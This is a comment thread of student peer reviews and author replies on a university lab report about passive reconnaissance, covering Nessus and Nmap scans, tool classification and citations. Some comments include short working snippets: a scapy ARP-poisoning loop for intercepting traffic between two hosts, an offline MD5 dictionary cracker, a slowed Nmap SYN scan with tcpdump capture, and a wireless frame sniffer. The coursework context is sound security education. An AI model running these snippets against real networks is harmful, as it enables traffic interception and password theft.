May 13, 2025

12 thoughts on “TECH 581 W Computer Network Operations: Laboratory 3, Team 3”

  1. This group did not follow the requirements for post submission. The tags were not included. In the abstract, the group mentions creating a definition of active reconnaissance. That should have been done in the second lab report; for this lab the group should be looking at creating a definition of passive reconnaissance. APA 5th edition citations were not used in the literature review: you need to have author name, year, and page number. In the abstract, the group talks about ‘meta exploit’; I think they meant Metasploit. The literature review was not cohesive and read like a list. First the group discusses one article and goes through the list of questions that were required to be answered; then the group moves on to the next article and goes through the same list of questions. In the second article, by Godefroid, the group used many lines directly from the article, and I see no citations for them. Unlike the first article the group addressed, Godefroid’s article was not reviewed very thoroughly, and none of the required questions were answered. The group should have gone into more detail about Godefroid’s article. I would like to have seen the group research the conference at which Godefroid presented this proposal; that would be part of the literature review into the supporting data of the article.
    It was interesting to see that this group decided not to use the Citrix environment and used their own ‘real’ equipment. I think that the group should have at least attempted to use the Citrix environment for this lab; judging from the other groups’ reviews, they were all able to perform this part of the lab using the environment. I would have liked to see more detail in the methodology section so that this lab report could be handed over to other people and have them be able to recreate the same process and perform the lab experiment. For some reason the group decided to give each part of the lab experiment a separate results section. For more cohesiveness, the group should put all of the issues or problems into one paragraph; I do not feel there is a need to have the issues separated by parts. Citations found in the results and discussion, like those in the literature review, did not follow the APA 5th edition format. I found that conclusions were discussed in the results section of the lab report. As far as the table is concerned, I do not see how vendor instructions can be considered to be kinetic; I hope the group can further clarify this for me in a comment. I would also like to see how the group defined stealth as a layer 8 attack tool. I think stealth can be passive or active: I can sneak around and punch someone, as long as I am stealthy. One more thing: I would like to have seen screenshots from their procedures.

  2. The introduction section for this lab report was excellently written and set out the principles that would be considered in the lab write-up in terms of scope and definition. I was hoping this would lead into a literature review of passive reconnaissance terminology and literature. The literature review only addresses the articles given out with the lab exercises. While they are each evaluated extensively, with analysis of the methods and application to the lab exercises of the course, they are not contrasted against each other. Missing from the literature review is any discussion of other methods of passive reconnaissance.

    The methodology for part one only discusses breaking down the list created in lab one and categorizing the tools that were found in that list. It would have been nice to see some other sources evaluated. The write-up for 2a was detailed but didn’t talk enough about how the traffic between the two segments was going to be configured so that the “observer” could see the entire “conversation” between the two hosts. The method of searching security lists and bug-tracker databases was innovative; web searches didn’t turn up much, and I hadn’t thought of those sources.

    I disagree with the classification of password crackers as reconnaissance in the results. Grabbing the password off of the wire would be passive in nature and classify as reconnaissance, but cracking an encrypted password grabbed off the wire falls out of the realm of reconnaissance into simply cracking. This section also mentions the use of digital forensic tools and that, since they can be used in such a way that they leave “little trace of the event,” they can be considered passive. I believe the observer effect comes into play when dealing with manipulating files on a machine you have physical access to. Simply loading the tool fundamentally alters the state of the machine such that the activity can be considered active.
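
    To be clear about what I mean by “simply cracking”: once a hash has been sniffed or copied, everything that follows is local computation with no further network activity at all. A toy sketch of that offline step (the hash, algorithm, and wordlist below are made up purely for illustration):

        import hashlib

        # Stand-in for a hash sniffed off the wire or pulled from a copied file.
        captured_hash = hashlib.md5(b"letmein").hexdigest()

        # A tiny, made-up wordlist; a real cracker would iterate a large dictionary.
        wordlist = ["password", "123456", "letmein", "qwerty"]

        for guess in wordlist:
            if hashlib.md5(guess.encode()).hexdigest() == captured_hash:
                print("recovered password:", guess)
                break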

    The findings of part 2b open like a literature review. It would have been good to see that further up and contrasted against the other types of passive reconnaissance. The mention of the “many eyes” principle when talking about source code and cryptography shows a good depth of research that should be discussed in the literature review. The findings cover a wide range of issues surrounding possibly malicious exploit tools; one that is missing is monitoring the output of the tool. Sandboxing is mentioned, but with no specific details as to what would be monitored. If a tool is maliciously sending data to its author, that is a channel that could be monitored and scrutinized, as sketched below.

    In the findings for 2b, source code auditing is mentioned along with the many eyes principle. In the table created for part 1 of the lab, blueprints are mentioned as a layer one exploit tool. Would source code fit in this category as well? Certainly if you can review the code for errors or security flaws from a defensive perspective, it could also be done from an offensive perspective.

  3. Team three presented an abstract that was complete and within the bounds of the syllabus; it did not meet the length requirement, but it otherwise explained what was going to be performed in the lab and did not read as a list of objectives. I agree with the introduction and consider it to be the best introduction in the group of lab three assignments. Team three explains the definition of passive recon in terms of active recon and how the two differ. This makes for an approach that, while requiring the reader to understand the previous lab, does aid in understanding. I find it simpler to understand active recon than passive recon, and this explanation can be rather beneficial.

    Team three then goes on to present their review of the literature of the week. Since there were only two articles to be read for this week, creating a cohesive literature review should be a simple task; however, team three’s literature review is nothing more than a list of readings with APA 5th edition citations. The literature review does cover both articles, relates them to the lab, and answers the questions in the syllabus, but it cannot be ignored that there is no cohesion between the articles themselves, leaving the analysis lacking. After the literature review, team three follows the lab format provided in the syllabus and lists their methods. Their methods do show the strategy and technique that team three followed to complete their lab. However, the methods themselves are broken into sections that correspond to the sections of the lab design document. There is no unification in team three’s methods, causing them to appear academically lacking.

    Team three presents their findings in the same manner as their methods, split by lab section. In part one they explain their reasoning for selecting the tools they selected as passive, based on the definition presented in the introduction. While I agree with their definition and see how they follow that definition to their results, I must disagree with some of the part one findings. They list password-cracking tools that perform offline cracking after gathering file data from a target system through either packet captures or booting the target system from a Linux live boot disk and gathering the file data in that manner. I question that approach as being passive; physical access to a system and performing a boot from live boot media could cause someone other than the attacker to notice, thereby increasing risk and making it an active recon tool. I agree with team three’s findings in sections two-A and two-B. However, as stated above, the findings, as well as the issues sections, are not unified. This is outside the format of the syllabus and does not present a lab that is academic in nature. I agree with the conclusions drawn by team three, especially with the UNIX systems bias in NMAP and Nessus. This is in direct disagreement with team one, and leaves me questioning that team’s findings. In team three’s passive recon table I see NetStumbler and Aircrack listed in layer one. I question this placement of the tools: 802.11, while specifying the use of radio as a transmission medium, is primarily a layer 2 technology. Finally, in layer 8, they list stealth as a passive recon tool. While I understand the placement, stealth seems to me to be a tool that aids passive recon, not a tool that performs passive recon.

  4. This group wrote a good abstract; however, did they mean Metasploit instead of ‘meta exploit’? I also liked their introduction. This group did not seem to follow the requirements for post submission. I noticed in their literature review that they only used page numbers in their citations; they need to make sure they include the author, year, and page number. APA 5th edition citations were not used in the literature review. The literature reviews were not very thorough, and none of the required questions were answered. I did like that they separated parts 2A and 2B; however, it was confusing how they listed their results after each part instead of in one section. They listed tools that have been exploited, but I did not see any specific case studies.
    I find it hard to believe that they couldn’t find any incidents (cases) relating to penetration tools being exploited.

  5. This group’s abstract very briefly explains the purpose of this lab and then goes into explaining the different parts of the lab. Parts of the abstract look like they were taken from the last lab and not changed: the abstract talks about the lab being about active reconnaissance when it is actually about passive reconnaissance. Next the group gives an introduction to the lab. In the introduction the group starts off nicely by tying this lab into the last. They introduce three properties of passive reconnaissance, just as they did with the last lab on active reconnaissance. The three properties that the group gives to passive reconnaissance are: uncertainty, invariant risk, and limit of scope. They then go into explaining each of the properties in detail, comparing them to the properties of active tools given in the last lab. These properties were a nice addition to the lab paper; they add more to the explanation of both the active and passive tools used in these labs. The group then ties their explanation of passive reconnaissance tools into the lab and describes each step briefly.

    Next the group goes into their literature review of the articles given in the lab. The group starts off giving a good summary of Privacy Oracle: a System for Finding Application Leaks with Black Box Differential Testing (Jang et al., 2008). They then give a good explanation of the methodology of the paper by explaining how the tests were done using the Privacy Oracle program as the black box, Wireshark to capture the output, and AutoIT to generate inputs to Privacy Oracle. The group then does a decent job of tying the article into the lab. The group then talks about the paper Random Testing for Security: Blackbox vs. Whitebox Fuzzing (Godefroid, 2007). They do a nice job of explaining what the paper was about and how it will tie into this lab. The problem with this group’s literature reviews is that they are missing a few things: in each review the group does not talk about the theme or topic of the article, the research question, the research data, or any errors or omissions. As for Godefroid’s paper, it is missing a lot of things and the group did not touch on these.

    Next the group starts in on the methods of the lab. They start by explaining that they created a table of passive tools, from the table created in the first lab, using the definition of a passive tool given in the introduction of this paper. Then the group explains how they tested some of the tools and, finally, how slowing tools down can reclassify them as passive. The group then explains part 2a of the lab. In this explanation the group does a very nice job of explaining how the whole scenario was set up. The group used their own network setup instead of the provided Citrix network due to its cumbersome nature. The group then explained how the test was set up on three machines. The group explains how the test was carried out but does not give details on how each program was set up for the test. The explanation of how the test was put together was very good but lacked details such as what commands were used in Nessus and Nmap and how Wireshark’s filters were set up (a rough sketch of the sort of detail I mean appears at the end of this comment). The group then explained how research was done to locate information on compromised network security tools. They explain that the information was not found easily until they looked into security issues and bug-tracking sites. They gathered a good sampling of tools for examination. They also did research on the Open Source movement, and comparisons were made against the practices of proprietary software vendors. Last, they did research on code review techniques and safe methods of software deployment.

    Next the group discussed their results for each part of the lab. They started with the generation of the passive tool table. They explain that they found that sniffers did not add to the network traffic and that scanners did add to the traffic and could be detected. The group did a nice job of giving examples of each of these. Then the group does a great job of explaining the different ways that information can be obtained on a network and classifies each as either active reconnaissance or passive reconnaissance. They use the example of gaining passwords using the different types of information gathering. They also talk about other tools that gather information and classify them as well. I think that the group did a nice job of further explaining the differences between active and passive tools, but did not need to go into as much detail on the active tools. Then, in the last section of part one, the group talks about how slowing down an active tool could turn it into a passive tool. The group does a nice job of explaining how this slowing of an active tool will move it from risk to invariant risk. I would still say that the tool is classified as an active tool, though, because each packet that is sent out to the target is still seen by the target, and the series of packets could (even if it is most unlikely) be recognized as an aggressive scan of the network if looked into further. The target can still detect the attack even though it might not determine it to be a risk. On the other hand, you do have a point that the active tool would be viewed as a passive tool in that situation, but I would still classify it as an active tool and not a passive one.

    In the description of the results of part 2a, the group talks about the results of the Nessus and Nmap scans of the target machine. They noticed that Nessus provided more information than Nmap, even though Nmap gave more precise information. The group even made a discovery while doing the scans: they found that VMware had left some vulnerabilities on a Windows Vista machine after being uninstalled. The group then talked about how their setup of the third-party observation of the scans did not provide the information they were expecting. This lack of information was due to their network being a switched network. In our setup we were able to capture any scan of any machine on the subnet and observe all the traffic sent from one to the other. They had similar results when running lanmap against their network. They then talk about how the passive analysis could have been done by introducing it onto an older hub-based network or a wireless network, and they go into an example of how a wireless network could be analyzed in a passive manner. The group then commented on how the exploits used in Nessus are classified by operating system and service, which allows a user to eliminate a large number of exploits based on these criteria alone. The group then talks about how Nessus and Nmap both have a bias toward UNIX-based systems. They claim this is due to both of these tools being UNIX-based programs and to the variety of UNIX-like distributions. Last in this part of the lab, the group states that the vast majority of the exploits in Nessus reside in the topmost layers of the OSI model. This, according to the group, is due to the issue of compounded complexity and to the fact that higher-level services are subject to a greater variety of implementations. In this part of the lab the group did a great job of covering all the sections; I didn’t find a lot that this group did wrong or left out.

    In the last part of the lab, the group starts off with a nice introduction to the findings of that part; I really like the opening sentence. The group then claims that most exploit tools are open source, so the discussion of the security of open source tools comes down to a discussion of open source software in general. The group then goes on to show that the debate over the security of open source versus proprietary software is split right down the middle. The group then comes up with a few cases of vulnerabilities in some tools, but claims that they found only one vague case of an exploited tool, and they do not say what it was or explain it in any way. They conclude this section by saying that there is no reason to suspect that open source security tools present a greater risk than any other application. I think that this section was not looked into as thoroughly as it should have been; in our lab we were able to come up with a few exploited security tools. The group then does a nice job of giving some ways to ensure that the programs being used are not infected. Last in this section, they warn that extra caution should be applied to open source penetration tools compared to other software. Next the group covered some issues they had with installation of some of the software needed for the assignments. Last, for the conclusion, the group wraps up what they learned in each section. It would have been nice to see some type of overall conclusion to this lab showing what they learned from the whole lab in general.
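
    To illustrate the sort of concrete detail I would have liked to see for part 2a, something like the following would do; the addresses, interface, and port range are placeholders, not the team’s actual settings. The -T0 timing option is also one concrete way to “slow down” a scan in the sense discussed above:

        import subprocess

        TARGET = "192.168.1.20"        # scanned host (assumed address)
        OBSERVER_IFACE = "eth0"        # interface the observer sniffs on (assumed)

        # Start the observer's capture first, limited to the conversation of
        # interest; the same "host" expression also works as a Wireshark
        # capture filter.
        capture = subprocess.Popen(
            ["tcpdump", "-i", OBSERVER_IFACE, "-w", "scan.pcap", "host " + TARGET])

        # A deliberately slowed SYN scan: -T0 ("paranoid") stretches the probes
        # out so far that the traffic approaches the "invariant risk" case.
        subprocess.run(["nmap", "-sS", "-T0", "-p", "1-1024", TARGET])

        capture.terminate()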

  6. Team three gave an overview of the lab within the abstract. However, I was somewhat unclear when they stated “First, we develop a definition of ‘active reconnaissance’ within the scope of network penetration attacks”, for this lab dealt with passive reconnaissance tools. The introduction cleared this confusion by stating “If it is possible to classify an ‘active’ reconnaissance tool, then to, it follows that a ‘passive’ reconnaissance tool must be subject to some similar definition.” Group three went on to say that passive tools exhibit three characteristics: uncertainty, invariant risk, and limit of scope.

    Team three’s methodology differed somewhat from that of the other teams. Team three installed the tools that were to be used in this lab on a real wired network, with actual physical host machines present. This method was chosen because, as team three stated, “This particular setup was chosen for ease of use (as the VMware Workstation setup over Citrix can become cumbersome to use) and ‘realness’ of application: we were not certain how precisely VMware’s virtual network hardware duplicates the characteristics of switched Ethernet LANs.”
    Team three differed from the other groups in that they classified offline password crackers as a passive tool. The rationale behind this classification was that “‘Offline’ password crackers require certain files to be extracted from the target machine or sniffed off of the network before being analyzed. Because of their lack of network activity, they are passive by nature.” Team three went on to include live discs as a passive reconnaissance tool. They stated, “If physical access to the target machine is available, it’s possible to breech a Windows system using a Linux distribution on a bootable medium. From there, disk imaging, file carving, or simply copying select files can be accomplished with leaving little trace of the event.” Team three also stated that “an ‘active’ tool may approach ‘passive’ classification when its presence can no longer be identified on the network by a scanning signature alone: essentially a shift from a ‘risk’ to an ‘invariant risk’ characteristic classification.”

    Team three came to the same conclusion as team four about the biases of the Nessus and Nmap tools. Most of the other teams thought the tools were biased against Windows, but teams three and four realized that the vast majority of plug-ins were for UNIX-based systems. Team three went on to say, “For instance, AIX, IBM’s commercial UNIX product, has a list of nearly five thousand vulnerabilities which are checked. Microsoft Windows, on the other hand, is evaluated against a list of about fourteen hundred.” Team three’s rationale for this phenomenon was, “Both NMAP and NESSUS arose from within the UNIX-based community; therefore it is unsurprising that they remain largely UNIX-based tools with a ‘server’ rather than a ‘workstation’ emphasis.”

    Team three found vulnerabilities in the Wireshark, Nessus, and Nmap tools and came to the conclusion that open source tools were no more insecure than proprietary tools.

    Team three did not include the risks that running untested penetration testing tools could have on an enterprise network.

  7. Upon reading this group’s lab I was pleased to see the detail taken within the lab. Let us start with the abstract: it was to the point and explained the overall concept of the lab and what was going to be done. Then we move on to the introduction of their lab. After reading the section, I wanted to know whether there is an in-between for passive and aggressive or whether it is just black and white, or whether there is a point where they switch back and forth. Would it be possible to make an argument that there are passive tools that can become active? Their definition is that a “passive” action creates no “new” risk above what already exists. Is there a better explanation for these two types of attacks? Many sites describe passive attacks as attacks that do no damage and only gather information (http://www.itglossary.net/passiveatt.html), while an aggressive attack is the opposite: an attack that is meant to cause issues.

    Next, on to the literature review: the students did a good job of reviewing the literature. There were still items that could have been added to the review, such as comparing any arguments between the papers and questioning author decisions; part of a literature review includes contrasting arguments and asking questions to get the most out of the papers or articles. Next was the methodology section, and it was straightforward and described what they did within this portion of the lab. Next is the results/findings section, and one thing I wanted to know is the students’ thoughts on using the tools outside the lab environment, in a corporate setting. What tools do they think would be useful and non-hostile to the environment, and what tools may be hostile and should not be used? One such tool that probably would not be good, as described within the lab, would be Nessus. But why should it not be used, besides the network traffic it gives off? Could a user other than the red team be using a packet analyzer and also gain the same information that is being tested for? I know vulnerabilities were found in both the Windows environment and the UNIX environment, but what were the different vulnerabilities? Were the ones on Windows more serious than the UNIX vulnerabilities? Then came the issues section, and their issues were described well. Lastly came the conclusion, and it described what was done in the lab, their views on this lab, and how attacks should be handled. Overall they did a good job, and adding some of their own input on the authors and what they found would help readers understand their point of view. This would then lead to more discussion of not only the topic but also their views, and make it a more interesting read.

  8. I think that group 3’s write-up for lab 3 was very good in most sections and fairly poor in others. The abstract and introduction for this lab were very good. The literature review was somewhat poor. Group 3 did not answer all of the required questions for the literature review: they did not explain the research methodology, whether there were any errors or omissions in the readings, or whether or not they agreed with the readings. The group did, however, explain how the readings relate to the laboratory. The citations for the literature review were present but not proper throughout the lab; the literature review was cited properly except for including only page numbers. The author and year of the reference should be included in addition to the page number.

    For part 2A, the lab environment was not set up as per the syllabus. While I don’t believe that the setup used (Windows Vista/FreeBSD) really changed the results, the Citrix environment should be used. If the group does not wish to use Citrix, then the correct virtual machines should be used and IP’d properly (statically and not via DHCP) to prevent confusion. Also, the group indicates that they are unsure of the actual validity of VMware’s switching capabilities as opposed to using physical hardware. This brings up two questions: did the group actually research this, and why couldn’t the group use the physical adapter on the host machine (bridged mode)? Is this any different than using the adapter from the host machine?

    In the results and discussions section for part one, the analysis was done very well. All of the questions for this section were answered, and answered well. In the results and discussions section for part 2A, the analysis starts out well. Shortly after, there is an “interesting side note” that doesn’t relate to the laboratory and makes me wonder why they felt the need to include it. The group goes on to explain that the results of the test were disappointing, when it seems that the actual test is the disappointing part. The group was not able to capture the attack packets and did not include any analysis of why this is the case. The group hints at the possibility of different results on different hardware, but does not provide any depth to this theory. Does this depend on the switch being used? Does this mean that a NIC in promiscuous mode does NOT capture all packets on the LAN? What about mixing this with OTHER security tools (I believe this is the point of the lab)? Since the beginning of this course we have been researching security tools. Doesn’t a tool like Ettercap strike you as an important tool to try? If the packets are not being broadcast across the network, then what if the observer was in between the traffic (this is why it’s called a Man-In-The-Middle attack)? What traffic can you see when you ARP poison one way? How about both ways? (A rough sketch of that idea appears at the end of this comment.) When discussing the biases in Nessus and Nmap, the group answered the question well. Also, their analysis of how these vulnerabilities fit into the grid was accurate as well. For the results of part 2B, the findings are discussed well and accurately answer all of the required questions. The issues and problems section was done well, with the exception of a part in 2A where the group indicates that the GUI version of Nmap is better, with no evidence of why. Is Nmap easier to script as a GUI application or as a console application using a shell scripting language? The conclusion to this laboratory was also well done because it accurately sums up their procedures and findings.
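
    As a hypothetical sketch of the ARP-poisoning idea: the observer tells both hosts that its MAC address belongs to the other, so their conversation flows through the observer even on a switched LAN. The addresses below are placeholders, and IP forwarding would need to be enabled on the observer so the traffic still reaches its real destination:

        import time
        from scapy.all import ARP, send, getmacbyip

        HOST_A = "192.168.1.10"   # scanning machine (assumed address)
        HOST_B = "192.168.1.20"   # target machine (assumed address)

        mac_a = getmacbyip(HOST_A)
        mac_b = getmacbyip(HOST_B)

        while True:
            # Poison both directions so the full conversation is visible,
            # not just one half of it.
            send(ARP(op=2, pdst=HOST_A, hwdst=mac_a, psrc=HOST_B), verbose=False)
            send(ARP(op=2, pdst=HOST_B, hwdst=mac_b, psrc=HOST_A), verbose=False)
            time.sleep(2)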

  9. The team started with a strong abstract indicating the key points of their laboratory. They covered the different tools that the team was going to use for scanning packets. Their literature review was very in-depth.
    Under the Methodology and Procedure for part 2a, the team reports using Windows XP 32-bit Service Pack 3, Microsoft Windows Vista 32-bit Service Pack 2, and FreeBSD 7.1 Release i386. Lab 1 required the build of two Windows XP machines, one Windows Server machine, and one Linux machine. I am simply wondering where the Windows Vista machine appeared and why. Was there an advantage in using a Windows Vista machine rather than a Windows XP machine for this lab? The team then talks about not using the Citrix virtual machine because it was becoming cumbersome; however, this part is better suited to the problems and issues section of the lab. Like other teams, Nessus and Nmap were combined onto one system. The team’s findings were very in-depth; they broke their findings up into the different sections.
    The problems and issues section was broken up very nicely. The team had their main problems in part 2a. The team reports that they attempted to install the Nessus daemon on KnoppixSTD but failed. What was the error that was given? Did it simply return a basic failure error, such as the “this should never have happen” message that appears when booting BackTrack into RAM on a machine with less than two gigs of RAM?

  10. Generally: the comments about the ‘active’ definition in the abstract; this was an editing error and should have read ‘passive.’ Apologies for any confusion this caused: it will be watched for in the future. To those who questioned the use of ‘real’ hosts and networks: I see no instruction which forbids this, and would argue a ‘real world’ based test ALWAYS trumps a simulation in credibility of experimental results, so why not use the better opportunity if available?

    @mvanbode, mafaulkn: The term ‘meta exploit’ is taken directly from the lab 3 instructions; it is in no way meant to refer to the ‘Metasploit’ framework.

    @mvanbode: The ‘Vendor Instructions’ (for SCADA devices: perhaps this should have been stated more clearly) are included in layer zero for the same reason ‘Specifications’ are included in layer one as ‘passive’ reconnaissance means. Installation manuals for devices such as these contain a wealth of information about device operation and setup, for example: http://www.hitachi-ds.com/en/download/plcmanuals/ . I believe much of this disagreement may be based around the ‘layer zero’ definition, which is really a philosophical dispute.

    @jverburg, nbakker in regards to ‘cracking’ and forensics: As I cannot directly perceive the information in the binary signal going down ‘the wire,’ I rely on such tools as Wireshark to ‘decrypt’ this information for me. I think this same relationship holds for the cracking of sniffed passwords, and therefore ‘crackers’ fit the same role Wireshark serves in reconnaissance. The forensic and boot disk tools, I admit, are controversial. If used on the target’s premises, I, too, would agree that they are ‘active.’ However, the only time I have ever used these tools has been in ‘cracking’ used workstations which I had acquired through legitimate means: workstations which were never wiped of the prior user’s data. I think this is an important ‘passive’ or ‘offline’ use of these tools in reconnaissance.

    @jverburg: Is source code similar to blueprints? Sure, in some ways; but I think UML documents are closer to blueprints than source code. Source code is the ‘boards and nails’ of software construction. If ‘source code’ is included as a passive tool, in which OSI layer does it belong? To further complicate the matter, the mixing of hardware function and software ‘code’ often becomes so blurred, that no practical difference exists: is microprocessor RTL a ‘source code’ or a hardware specification? Is human DNA a ‘program definition’ or a type of ‘biological hardware?’ Interesting question, I don’t know that I have an exact answer, however.

    @shumpfer: I think that I found a question about our definition of ‘passive’ presented, correct? Foremost, I must emphasize that we were defining ‘passive reconnaissance’ and not simply ‘passive’; this is key in that ALL THREE criteria must be met in order for a tool to qualify in this category. Additionally, what exactly IS a ‘passive attack?’ It seems a strange union of antonymic terms. Finally, I found the definition referenced in the weblink to be so vague as to be unusable. What is the ‘system’ referred to in this definition? If it is the entire network and all hosts operating on it, consider that any host is changed simply by the act of running software. Would this then make Wireshark an ‘active attack,’ as it is being run on a host in the ‘system?’ If I were to be pedantic, by quantum theory just the act of observing ‘changes the system’; it would seem, then, that ‘passive reconnaissance’ is impossible under this definition.

    @prennick: I would judge ‘man in the middle’ or ARP poisoning attacks NOT to be passive reconnaissance methods, but active ones. Sure, we probably could have done a number of ‘active’ things to circumvent the switched network limitation, but that was not the point of this exercise in ‘passive reconnaissance’ of a running ‘active’ tool. If you use an active tool to monitor a running active tool, what have you gained? A single active tool without any ‘observer’ would be just as effective, with half of the risk. Additionally, do you really think it necessary to explain the difference ‘in hardware’ between switches and hubs, or what broadcast and multicast packets are? Many of the ‘captive audience’ are IT professionals: I thought it might be pointless and even insulting to rehash such basic concepts. I felt we related only the necessary details, with the rest being ‘well understood’ by the target audience.

  11. @mvanbode – Yep, we didn’t include the tags. Our bad. Did it cause you undue difficulty in finding the submission? There were never any instructions that said Citrix HAD to be used, but I concede that results will vary with a different setup.

    @jverberg – yes, analyzing output from the tools would be another method of audit. I kind of thought of it as part of the sandbox process, but it is specific enough to be mentioned on its own. I disagree with my teammate about source code audit being layer one. I think that’s a good extension. I think that a case might be made for it at both layer one and layer 7 though.

    @nbakker – What is your obsession with abstract length? I can understand if you said that the lab is hard to read the way it is divided, but how is it not academic?

    @mafaulkn – you didn’t appear to find any cases of exploited tools either.

    @jeikenbe – why do you think it is that the Godefroid article is “missing” so many pieces? What exploited tools did you find? You discussed some vulnerabilities, but didn’t report any actual cases of exploitation. There’s a difference between potential and actual. Perhaps you should go back and reread section 2B; you appear to have misunderstood it.

    @tnovosel – from our lab: “anything released into a production system untested may have catastrophic consequences.”

    @chaveza – please have someone review your writing before you submit it.

  12. I think it was interesting that the group in general jumped on the switched network and either suggested the attack could go forward with ARP poisoning or that it could not go forward because it was not a broadcast domain, in the latter case dismissing the meta exploit (exploit of an exploit) without considering several interesting features of real-world information technology infrastructures. In the first case, wireless is a broadcast domain, and unless traffic is fully encrypted it can be subject to sniffing through wireless means (a rough sketch of this appears below). Further, since wireless access points are “exposed,” getting access to the wireless backbone could provide the equivalent of a broadcast domain. In general, though, there is some providence that must be accepted. In the pyramid hierarchy of access, distribution, and core in information technology infrastructures, the higher you can get, the more likely you are to see the audit device. Auditors are primarily lazy, and instead of moving around on a switch creating VLANs they will often find a central point to plug into and run all scans from that single location. Their choice of procedure dictates a vulnerability to the passive scanner. In the end, even a passive attack will often have some element of risk of detection. In some ways, passive capability is trading on physical access, while active capability is decreasing the need for that physical access.
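
    As a rough sketch of that wireless point, a card in monitor mode can passively observe 802.11 frames for the whole broadcast domain. The interface name below is a placeholder, and putting the card into monitor mode (e.g., with airmon-ng) is assumed to have been done separately:

        from scapy.all import sniff, Dot11

        def show_frame(pkt):
            if pkt.haslayer(Dot11):
                # addr2 is the transmitter address on most 802.11 frames.
                print(pkt[Dot11].addr2, "type", pkt[Dot11].type, "subtype", pkt[Dot11].subtype)

        # Passive capture of one hundred frames on a monitor-mode interface.
        sniff(iface="wlan0mon", prn=show_frame, count=100)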

Comments are closed.